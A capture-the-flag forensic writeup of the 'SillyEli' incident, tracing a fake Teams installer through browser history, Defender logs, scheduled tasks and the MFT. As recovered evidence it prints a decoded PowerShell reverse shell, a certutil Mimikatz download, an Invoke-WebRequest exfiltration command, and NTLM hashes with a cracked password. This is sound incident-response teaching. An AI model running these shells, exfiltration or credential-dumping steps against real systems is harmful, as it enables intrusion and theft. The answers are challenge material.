April 8, 2026

SillyEli Writeup

Writeup for the hard DFIR Sherlock SillyEli.

  • writeup
  • forensics
  • hackthebox

Introduction

Eli, a recent addition to the IT team, is eager to settle into his new role. Due to the company’s flexible “Bring Your Own Device” (BYOD) policy, which applies to everyone except IT administrators, Eli receives a newly prepared PC from Metushelah, the senior IT administrator, as part of the IT team’s secure device protocol. Eli’s first priority is to install essential applications that will enable him to connect seamlessly with the rest of the team. He begins setting up the system and downloading the necessary software. After a few days on the job, Eli starts noticing something unusual: every so often, a PowerShell window flashes on his screen, disappearing almost instantly, too quickly to read any of its contents. Assuming it’s just a minor glitch, Eli continues with his work. However, as the unexpected PowerShell pop-ups persist, Eli decides to consult Metushelah. Metushelah suspects these PowerShell flashes could indicate malicious activity. To ensure there are no security breaches, he conducts a forensic acquisition of Eli’s PC and forwards it to the Incident Response team for further analysis. Now, as a member of the IR team, your mission is to investigate Eli’s workstation.

Walkthrough

Task 1 - Identify the specific time the malware was downloaded in UTC.

To find downloaded files we can open Firefox's places.sqlite database and look in the moz_annos table, which records download annotations. It holds only one downloaded file, TeamsSetup.exe. The table's dateAdded column stores the download time as microseconds since the Unix epoch, so it has to be converted to a human-readable format. For the downloaded file dateAdded is 1730858274151000, which converts to 2024-11-06 01:57:54 UTC.

Answer: 2024-11-06 01:57:54

Task 2 - Which domain name was the file downloaded from?

In the same database, the moz_places table shows that TeamsSetup.exe was downloaded from the domain filesuneedtodownload.s3.eu-north-1.amazonaws.com.

Answer: filesuneedtodownload.s3.eu-north-1.amazonaws.com
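As an added example (not part of the original writeup), the following script automates Tasks 1 and 2: it joins the download annotations in moz_annos with moz_places to recover the source URL, destination and download time, and converts the PRTime value. The in-memory database is a constructed, reduced stand-in for places.sqlite; the full download URL path and the destination path are assumptions, while the host and the dateAdded value come from the case. Point list_downloads() at a real sqlite3 connection to places.sqlite to run it on an acquisition.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

# Firefox stores moz_annos.dateAdded as PRTime: microseconds since the Unix epoch.
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def prtime_to_utc(microseconds: int) -> str:
    """Convert a Firefox PRTime value to a 'YYYY-MM-DD HH:MM:SS' UTC string."""
    return (EPOCH + timedelta(microseconds=microseconds)).strftime("%Y-%m-%d %H:%M:%S")


def list_downloads(conn: sqlite3.Connection) -> list:
    """Join download annotations with moz_places to get source URL, destination
    and download time for every download Firefox recorded."""
    rows = conn.execute(
        """
        SELECT p.url, a.content, a.dateAdded
        FROM moz_annos a
        JOIN moz_anno_attributes n ON n.id = a.anno_attribute_id
        JOIN moz_places p ON p.id = a.place_id
        WHERE n.name = 'downloads/destinationFileURI'
        ORDER BY a.dateAdded
        """
    ).fetchall()
    return [
        {
            "url": url,
            "host": urlparse(url).hostname,
            "destination": dest,
            "downloaded_utc": prtime_to_utc(date_added),
        }
        for url, dest, date_added in rows
    ]


def build_sample_places() -> sqlite3.Connection:
    """Constructed stand-in for places.sqlite with a reduced schema and one download.
    The URL path and destination are assumptions; host and timestamp are from the case."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT);
        CREATE TABLE moz_anno_attributes (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE moz_annos (id INTEGER PRIMARY KEY, place_id INTEGER,
                                anno_attribute_id INTEGER, content TEXT, dateAdded INTEGER);
        INSERT INTO moz_places VALUES
          (1, 'https://filesuneedtodownload.s3.eu-north-1.amazonaws.com/TeamsSetup.exe', 'TeamsSetup.exe'),
          (2, 'https://www.example.com/', 'Example');
        INSERT INTO moz_anno_attributes VALUES
          (1, 'downloads/destinationFileURI'), (2, 'downloads/metaData');
        INSERT INTO moz_annos VALUES
          (1, 1, 1, 'file:///C:/Users/Eli/Downloads/TeamsSetup.exe', 1730858274151000),
          (2, 1, 2, '{"state":1}', 1730858274151000);
        """
    )
    return conn


if __name__ == "__main__":
    for d in list_downloads(build_sample_places()):
        print(d["downloaded_utc"], d["host"], d["destination"])
```

Only the destinationFileURI annotation is selected, so each download appears once even though Firefox also stores a downloads/metaData annotation for it.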

Task 3 - Identify the SHA-1 hash of the malware.

Open the Amcache.hve hive and look for TeamsSetup.exe; its entry records the SHA-1 hash de733beed85f39605fcdea42dddee190506424f2.

Answer: de733beed85f39605fcdea42dddee190506424f2

Task 4 - It looks like malicious tool attempts to download a secondary tool during execution — find and provide the full URL.

When Microsoft Defender detects a potential threat, it writes a log entry under C:\ProgramData\Microsoft\Windows Defender\Support. In this folder we find the file MPDetection-20241029-115405.log, which contains the line: 2024-11-06T01:58:15.202 DETECTION Trojan:Win32/Ceprolad.A CmdLine:C:\Windows\System32\certutil.exe -urlcache -split -f https://github.com/gentilkiwi/mimikatz/archive/refs/heads/master.zip C:\Users\Eli\Documents\Mimikatz.zip

Answer: https://github.com/gentilkiwi/mimikatz/archive/refs/heads/master.zip
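The following parser is an added example, not code from the writeup: it pulls DETECTION records out of an MPDetection log and extracts any URLs from the detected command line, which is how a triage script would surface the certutil download above. The first sample line is the record quoted in the writeup; the other two lines are constructed to show a file detection and a non-DETECTION line being skipped, and the threat name HackTool:Win32/Constructed.Sample is invented for that purpose.

```python
import re
from dataclasses import dataclass, field

# A DETECTION line: ISO timestamp, the word DETECTION, the threat name, then the
# detected object as CmdLine:... or file:... . The trailing 'Z' on the timestamp is
# optional so both the quoted form and the usual log form are accepted.
DETECTION_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?)\s+DETECTION\s+"
    r"(?P<threat>\S+)\s+(?P<kind>CmdLine|file):(?P<object>.*)$"
)
URL_RE = re.compile(r"https?://[^\s\"']+")


@dataclass
class Detection:
    timestamp: str
    threat: str
    kind: str       # "CmdLine" or "file"
    obj: str        # the command line or file path Defender flagged
    urls: list = field(default_factory=list)


def parse_mpdetection(text: str) -> list:
    """Parse DETECTION records from MPDetection-*.log text and collect any URLs
    embedded in the detected object (e.g. a certutil -urlcache fetch)."""
    results = []
    for line in text.splitlines():
        m = DETECTION_RE.match(line.strip())
        if not m:
            continue
        obj = m["object"].strip()
        results.append(Detection(m["ts"], m["threat"], m["kind"], obj, URL_RE.findall(obj)))
    return results


def download_urls(detections: list) -> list:
    """Unique URLs seen across detections, in order of first appearance."""
    seen = []
    for d in detections:
        for u in d.urls:
            if u not in seen:
                seen.append(u)
    return seen


# Line 1 is the record quoted in the writeup; lines 2 and 3 are constructed.
SAMPLE_LOG = r"""
2024-11-06T01:58:15.202 DETECTION Trojan:Win32/Ceprolad.A CmdLine:C:\Windows\System32\certutil.exe -urlcache -split -f https://github.com/gentilkiwi/mimikatz/archive/refs/heads/master.zip C:\Users\Eli\Documents\Mimikatz.zip
2024-11-06T02:03:40.118Z DETECTION HackTool:Win32/Constructed.Sample file:C:\Users\Eli\Documents\Mimikatz.zip
2024-11-06T02:03:41.000Z DETECTION_ADD HackTool:Win32/Constructed.Sample file:C:\Users\Eli\Documents\Mimikatz.zip
"""

if __name__ == "__main__":
    for d in parse_mpdetection(SAMPLE_LOG):
        print(d.timestamp, d.threat, d.kind, d.urls)
```

Feed the real log file's contents to parse_mpdetection() and download_urls() gives the secondary-tool URL directly, without reading through the whole file.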

Task 5 - What is the name of the batch file created on the system as part of the malware execution?

Open the USN Journal and look for .bat files within the timeframe established above. We find a file called TeamsUpdater.bat, which was run at 2024-11-06T01:58:14Z.

Answer: TeamsUpdater.bat

Task 6 - What was the runtime duration of the malware? (Duration in Ms)

SRUM (the System Resource Usage Monitor) records how long applications were running. Its database is located at C:\Windows\System32\sru\SRUDB.dat; analysing it with srum_dump.exe produces an xlsx file in which we find TeamsSetup.exe with a runtime of 60003 ms.

Answer: 60003 ms

Task 7 - Locate the local URL cache and identify the full URL the threat actor used to download an additional tool during the attack. Include the complete URL with filename and extension.

CryptNetUrlCache holds entries for URLs fetched through the Windows CryptoAPI, for example when a downloaded file is signed and its certificate chain is checked. We can parse it with CryptNetUrlCacheParser.py (https://github.com/AbdulRhmanAlfaifi/CryptnetURLCacheParser), and the URL is easy to find because only one entry looks suspicious: https://filebin.net/archive/0rkhisv2iq4slveo/kape.zip

Answer: https://filebin.net/archive/0rkhisv2iq4slveo/kape.zip

Task 8 - What is the name of the scheduled task that the attacker created for persistence?

In the SOFTWARE hive go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, where we find a task called TeamsUpdater.

Answer: TeamsUpdater

Task 9 - What is the unique GUID associated with the malicious scheduled task?

In the same location as the previous task we can see the task's GUID: {A4F7ED3E-E7CD-4539-8E79-D73B568FC298}

Answer: {A4F7ED3E-E7CD-4539-8E79-D73B568FC298}

Task 10 - Identify the process or command executed by the malicious scheduled task.

In the same hive, the GUID leads us to the task definition under Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A4F7ED3E-E7CD-4539-8E79-D73B568FC298}, whose Actions value (shown here base64-encoded) is: AwAMAAAAQQB1AHQAaABvAHIAZmYAAAAAHAAAAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQC2AAAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEUAbABpAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABUAGUAYQBtAHMALgBwAHMAMQAAAAAAAAA=. Decoding this gives powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Eli\AppData\Local\Temp\Teams.ps1

Answer: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Eli\AppData\Local\Temp\Teams.ps1
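Added example, not from the writeup: a decoder for the binary Actions value rather than a plain base64 decode, so the executable path, arguments and working directory come out as separate fields. The layout it assumes is the documented TaskCache Actions format: a uint16 version, a length-prefixed UTF-16LE context string ("Author"), then one or more actions, each starting with a uint16 type where 0x6666 is an exec action holding four length-prefixed strings (id, path, arguments, working directory) and a uint16 flags field. The base64 input is the value quoted above.

```python
import base64
import struct

# Base64 form of the Actions value as quoted in the writeup.
ACTIONS_B64 = (
    "AwAMAAAAQQB1AHQAaABvAHIAZmYAAAAAHAAAAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQC2AAAALQBF"
    "AHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQA"
    "eQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEUAbABpAFwAQQBw"
    "AHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABUAGUAYQBtAHMALgBwAHMAMQAAAAAAAAA="
)

EXEC_ACTION = 0x6666  # action type: run a program


def _read_utf16(buf: bytes, off: int):
    """Read a uint32 byte-length prefix followed by a UTF-16LE string."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].decode("utf-16-le"), off + n


def parse_task_actions(b64: str) -> dict:
    """Decode a TaskCache\\Tasks\\{GUID} Actions value into its fields."""
    buf = base64.b64decode(b64)
    (version,) = struct.unpack_from("<H", buf, 0)
    context, off = _read_utf16(buf, 2)
    actions = []
    while off + 2 <= len(buf):
        (kind,) = struct.unpack_from("<H", buf, off)
        off += 2
        if kind != EXEC_ACTION:
            break  # COM handler / e-mail / message-box actions are not decoded here
        ident, off = _read_utf16(buf, off)
        path, off = _read_utf16(buf, off)
        args, off = _read_utf16(buf, off)
        workdir, off = _read_utf16(buf, off)
        flags = 0
        if off + 2 <= len(buf):
            (flags,) = struct.unpack_from("<H", buf, off)
            off += 2
        actions.append({
            "id": ident,
            "path": path,
            "arguments": args,
            "working_dir": workdir,
            "flags": flags,
            "command_line": (path + " " + args).strip(),
        })
    return {"version": version, "context": context, "actions": actions}


if __name__ == "__main__":
    parsed = parse_task_actions(ACTIONS_B64)
    print("context:", parsed["context"])
    for a in parsed["actions"]:
        print("exec:", a["command_line"])
```

Separating the fields matters for triage: -WindowStyle Hidden and -ExecutionPolicy Bypass in the arguments, together with a script under a user's Temp folder, are the details that make this task stand out from legitimate updater tasks.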

Task 11 - Identify the attacker’s IP address and port.

If we open the parsed MFT and search for Teams.ps1 we can find the file and see that it is only 599 bytes, which usually means its contents are stored resident in the MFT record itself. We can also see that the file's EntryNumber is 315567, which we can use to extract the file: .\MFTECmd.exe -f 'SillyEli\Acquisition\C\$MFT' --de 315567:

(NEW-obJECT SYSTem.Io.StreAmReADEr( ( NEW-obJECT  iO.ComPrEsSiOn.DEFlateStReam( [iO.memoRysTREAm][sYsTEM.coNvERT]::FROMbasE64stRiNg( 'TY9Ra8JAEITfC/0Py3EtdzQeiVHbGiy0oYhQtDRCHyTQJC56rYnibVBR/3svaVr6sMdyzHwzy00+EGPctSbpJ2YE0cEQ5mqMpKJ19oVk1DR8DVcaCxLMu28rr3enPP/WTps5nY4vpRoiRbTFJBcymKUHwlkc85RgAK5SvW7X756uju452C31CoXgesBNrt4wmQsrc1zHvuoFiwUtpYRWgeDKY8DnFvC/2xT3pB6jcDR6LrL1XBeL32i7NiTgWgaXFzw9bBJjLIDVBma/1iVtyqqU0LgHS28/XHtwgklJrR+GhBtgHwUDqza1ckZVJjZxcb/fgOvgJ3upEQ1XVp5cvW81obBuB6oy5u+u8zc=') ,[iO.CoMPreSSiOn.CompressioNmODe]::deCoMPRess) ), [systEm.text.EnCOdIng]::ascII) ).ReaDTOend() | Ie

Decompressing this gives us:

$sm=(New-Object System.Net.Sockets.TCPClient("192.168.137.132",443)).GetStream();[byte[]]$bt = 0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d = (New-Object Text.ASCIIEncoding).GetString($bt,0, $i);
$bypass = "ASCII"
$output = (iex $d 2>&1 | Out-String) + "`n"
$st = ([text.encoding]::$bypass).GetBytes($output)
$sm.Write($st, 0, $st.Length)}

The script connects back to 192.168.137.132 on port 443, so the answer is 192.168.137.132:443.

Answer: 192.168.137.132:443

Task 12 - What is the name of the sensitive file exfiltrated by the threat actor?

If we look in Eli's PowerShell command history we find the command: Invoke-WebRequest -Uri "http://91.240.118.162:8080/" -Method Post -InFile "C:\Users\Eli\Documents\Employees_Contact_Info.pdf" -ContentType "application/octet-stream";, which posts the file to the attacker's server and gives us the file name.

Answer: Employees_Contact_Info.pdf

Task 13 - Based on the contents of the document, what is Metushelah’s email address?

The Windows Search Index indexes most files on the system, including Employees_Contact_Info.pdf. It is stored in C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb. If we open this file with ESEDatabaseView, go to the table SystemIndex_PropertyStore and search for the file name Employees_Contact_Info.pdf, we can find the column 4625-System_Search_AutoSummary, which contains Metushelah's email [email protected]. To read more about this artifact: https://www.sans.org/presentations/windows-search-index-the-forensic-artifact-you-ve-been-searching-for

Answer: [email protected]

Task 14 - At what time did the attacker clear the Windows event logs? (in UTC)

When the event logs are cleared, an event with ID 1102 is written to the Security event log. This one was generated at 2024-11-06 02:16:50 UTC.

Answer: 2024-11-06 02:16:50 UTC

Task 15 - What is the name of the legitimate tool used by the threat actor to acquire the SAM and SYSTEM hives?

If we go to the Public user's Downloads folder we find a folder called KAPE and a folder called Registry, so the tool that was run is KAPE.

Answer: KAPE

Task 16 - Identify the password belonging to Eli’s account that were exfiltrated by the attacker to their C2 server.

To extract the password we can run Impacket's secretsdump against the SYSTEM and SAM hives, which gives us:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d9a2192b83449ffb92ddd5ad93144b43:::
Eli:1001:aad3b435b51404eeaad3b435b51404ee:4494236c3843cdc39ce068871bed96e0:::
Metushelah:1002:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

These lines are in the format user:RID:LM hash:NT hash:::. The LM field aad3b435b51404eeaad3b435b51404ee is the constant value for an empty LM password, so the usable part is the NT hash in the last field; for Eli that is 4494236c3843cdc39ce068871bed96e0. Looking this up on crackstation.net gives the password: blackrose

Answer: blackrose